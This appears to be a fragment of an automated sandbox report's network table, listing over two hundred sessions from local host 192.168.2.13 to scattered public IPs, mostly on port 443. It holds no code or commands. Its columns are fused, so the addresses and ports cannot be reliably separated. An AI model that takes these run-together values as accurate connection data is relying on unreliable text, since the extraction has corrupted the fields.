                                    11238192.168.2.135623214.219.210.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11239192.168.2.1338036130.128.53.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11240192.168.2.1358780163.134.118.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11241192.168.2.13406882.156.236.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11242192.168.2.1337404126.106.160.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11243192.168.2.134647891.122.62.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11244192.168.2.133317813.100.88.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11245192.168.2.1357058208.102.172.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11246192.168.2.1343130184.70.213.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11247192.168.2.1353996220.32.97.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11248192.168.2.1351554184.189.129.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11249192.168.2.133550241.101.73.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11250192.168.2.136004453.220.88.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11251192.168.2.1338456130.96.144.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11252192.168.2.135670297.172.160.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11253192.168.2.1346934179.27.59.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11254192.168.2.1335812136.104.190.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11255192.168.2.1353650146.51.173.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11256192.168.2.135883063.196.252.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11257192.168.2.135384627.185.104.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11258192.168.2.1354006177.57.212.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11259192.168.2.135813220.49.32.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11260192.168.2.1350336154.70.112.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11261192.168.2.13436225.80.121.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11262192.168.2.1339036118.83.142.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11263192.168.2.134987841.40.207.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11264192.168.2.13582769.56.144.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11265192.168.2.135645445.238.41.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11266192.168.2.1358614130.165.183.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11267192.168.2.134360239.124.135.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11268192.168.2.133479693.231.17.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11269192.168.2.1348352156.15.157.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11270192.168.2.134734438.223.187.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11271192.168.2.1350312136.168.60.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11272192.168.2.135387273.165.103.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11273192.168.2.1357738176.160.198.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11274192.168.2.1337222146.184.227.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11275192.168.2.135122653.167.184.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11276192.168.2.1340986157.173.91.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11277192.168.2.133352841.127.190.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11278192.168.2.1347076117.84.159.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11279192.168.2.134133672.238.24.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11280192.168.2.1351846112.168.56.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11281192.168.2.1335932170.26.75.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11282192.168.2.134496269.7.62.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11283192.168.2.1338192208.86.100.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11284192.168.2.1334768105.196.30.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11285192.168.2.1352500126.12.35.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11286192.168.2.135240294.64.196.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11287192.168.2.134071231.119.195.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11288192.168.2.134615440.74.195.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11289192.168.2.1353144154.181.78.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11290192.168.2.1334806193.144.219.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11291192.168.2.1349576112.196.92.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11292192.168.2.1356662217.118.180.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11293192.168.2.1353250114.190.188.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11294192.168.2.135697890.21.94.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11295192.168.2.135151074.124.168.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11296192.168.2.1357804175.198.185.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11297192.168.2.135486845.77.58.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11298192.168.2.134789613.178.128.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11299192.168.2.1355382155.183.192.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11300192.168.2.1342794161.183.23.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11301192.168.2.1346412176.177.199.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11302192.168.2.1355120189.132.0.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11303192.168.2.1347834217.9.247.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11304192.168.2.135865419.135.137.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11305192.168.2.135836212.64.155.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11306192.168.2.1342830218.237.57.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11307192.168.2.1341390219.38.29.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11308192.168.2.1355380162.124.244.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11309192.168.2.1347128166.70.228.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11310192.168.2.134676087.54.150.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11311192.168.2.1340452190.136.36.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11312192.168.2.1347940101.78.243.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11313192.168.2.134376420.0.242.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11314192.168.2.133430263.216.48.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11315192.168.2.135136091.109.31.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11316192.168.2.1350050147.122.168.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11317192.168.2.1337610123.85.6.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11318192.168.2.1342480177.129.214.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11319192.168.2.1344676122.206.246.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11320192.168.2.1358364223.121.224.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11321192.168.2.134612252.86.200.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11322192.168.2.1355572103.127.135.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11323192.168.2.1340674165.128.83.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11324192.168.2.1348502157.140.111.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11325192.168.2.1339448136.214.79.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11326192.168.2.134499038.142.55.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11327192.168.2.135575682.181.119.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11328192.168.2.1342408125.23.222.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11329192.168.2.134999839.255.103.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11330192.168.2.134470271.106.62.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11331192.168.2.136045247.146.15.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11332192.168.2.135281052.55.132.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11333192.168.2.135934299.59.187.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11334192.168.2.1346954183.157.212.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11335192.168.2.133602040.125.207.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11336192.168.2.134566042.91.231.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11337192.168.2.1342700152.162.216.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11338192.168.2.1352948118.138.130.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11339192.168.2.1349166179.221.104.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11340192.168.2.135105288.178.111.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11341192.168.2.1358636164.224.72.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11342192.168.2.1335106198.93.127.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11343192.168.2.1357132211.216.68.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11344192.168.2.1343408124.131.176.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11345192.168.2.1342330198.63.147.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11346192.168.2.1350656186.97.163.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11347192.168.2.1337352174.49.243.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11348192.168.2.1344574213.50.46.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11349192.168.2.1339774133.221.142.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11350192.168.2.133890677.58.230.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11351192.168.2.133962439.15.149.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11352192.168.2.135313495.39.96.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11353192.168.2.1335990174.143.164.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11354192.168.2.134575812.241.61.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11355192.168.2.1358274102.194.152.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11356192.168.2.1349630182.60.163.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11357192.168.2.13375545.120.9.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11358192.168.2.1352034104.34.224.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11359192.168.2.1359582172.2.89.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11360192.168.2.1336490206.147.222.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11361192.168.2.134894666.164.221.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11362192.168.2.1360498140.147.124.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11363192.168.2.136024881.207.225.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11364192.168.2.1341144157.188.214.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11365192.168.2.1357700190.12.219.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11366192.168.2.1356836194.144.62.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11367192.168.2.1340412192.75.226.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11368192.168.2.1342638201.239.25.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11369192.168.2.1337606178.175.156.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11370192.168.2.13346524.211.146.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11371192.168.2.13354141.108.94.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11372192.168.2.1340262185.214.57.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11373192.168.2.133330288.169.133.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11374192.168.2.13463084.59.24.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11375192.168.2.133455852.234.111.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11376192.168.2.1337278145.107.239.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11377192.168.2.1354310222.15.140.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11378192.168.2.1333470104.62.2.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11379192.168.2.133483058.89.155.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11380192.168.2.1349400138.76.84.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11381192.168.2.133897281.14.205.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11382192.168.2.1340028130.116.196.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11383192.168.2.1348234189.72.95.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11384192.168.2.1350414170.88.6.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11385192.168.2.135674817.170.108.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11386192.168.2.133597479.11.95.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11387192.168.2.13556088.27.118.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11388192.168.2.13455869.18.22.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11389192.168.2.136073261.29.28.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11390192.168.2.1336610125.250.241.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11391192.168.2.134873025.242.218.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11392192.168.2.135454823.177.58.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11393192.168.2.1337420221.164.88.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11394192.168.2.135071820.26.244.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11395192.168.2.13361685.253.1.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11396192.168.2.1339464218.125.101.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11397192.168.2.1353074175.80.138.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11398192.168.2.1350598189.122.239.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11399192.168.2.133809462.76.97.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11400192.168.2.135834879.46.101.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11401192.168.2.1345382166.21.45.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11402192.168.2.1360328178.50.189.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11403192.168.2.134586498.116.154.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11404192.168.2.133896042.31.147.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11405192.168.2.1340920195.32.111.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11406192.168.2.1357226204.203.0.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11407192.168.2.1335924172.70.168.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11408192.168.2.1348732124.242.73.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11409192.168.2.133550091.55.93.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11410192.168.2.1359470173.134.99.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11411192.168.2.1358518165.246.146.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11412192.168.2.1352944162.30.47.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11413192.168.2.134783852.45.134.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11414192.168.2.1358580144.190.21.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11415192.168.2.1342990182.139.54.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11416192.168.2.1345828137.66.57.438080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11417192.168.2.1358730119.3.188.1528080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11418192.168.2.134471054.82.93.2448080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11419192.168.2.1342556115.8.162.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11420192.168.2.1339362143.105.162.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11421192.168.2.1346356218.217.125.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11422192.168.2.1337220154.92.254.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11423192.168.2.135830486.170.41.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11424192.168.2.1334662124.69.94.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11425192.168.2.134178458.154.229.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11426192.168.2.1350542112.116.200.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11427192.168.2.135211242.25.48.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11428192.168.2.134201241.1.248.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11429192.168.2.134848073.146.187.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11430192.168.2.133866845.171.11.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11431192.168.2.1359044204.158.191.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11432192.168.2.135871827.50.248.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11433192.168.2.1356378118.130.14.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11434192.168.2.135693871.26.74.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11435192.168.2.1345132157.242.115.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11436192.168.2.1348662183.249.36.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11437192.168.2.1341718134.148.146.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11438192.168.2.134928882.165.8.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11439192.168.2.135510038.43.247.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11440192.168.2.135190625.202.224.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11441192.168.2.1338624204.109.162.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11442192.168.2.134239012.80.115.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11443192.168.2.1348422222.14.11.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11444192.168.2.1337504121.241.16.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11445192.168.2.1339788163.30.200.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11446192.168.2.135769299.242.40.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11447192.168.2.1345448108.176.227.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11448192.168.2.134258448.116.0.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11449192.168.2.1355874106.20.61.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11450192.168.2.1356976117.66.104.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11451192.168.2.1348034176.216.152.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11452192.168.2.1341762177.136.248.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11453192.168.2.1351748116.251.49.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11454192.168.2.1360930156.72.246.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11455192.168.2.1345460173.114.146.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11456192.168.2.133593014.155.74.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11457192.168.2.13433801.9.235.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11458192.168.2.1345346182.199.20.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11459192.168.2.133845096.233.87.251443
                                    TimestampBytes transferredDirectionData


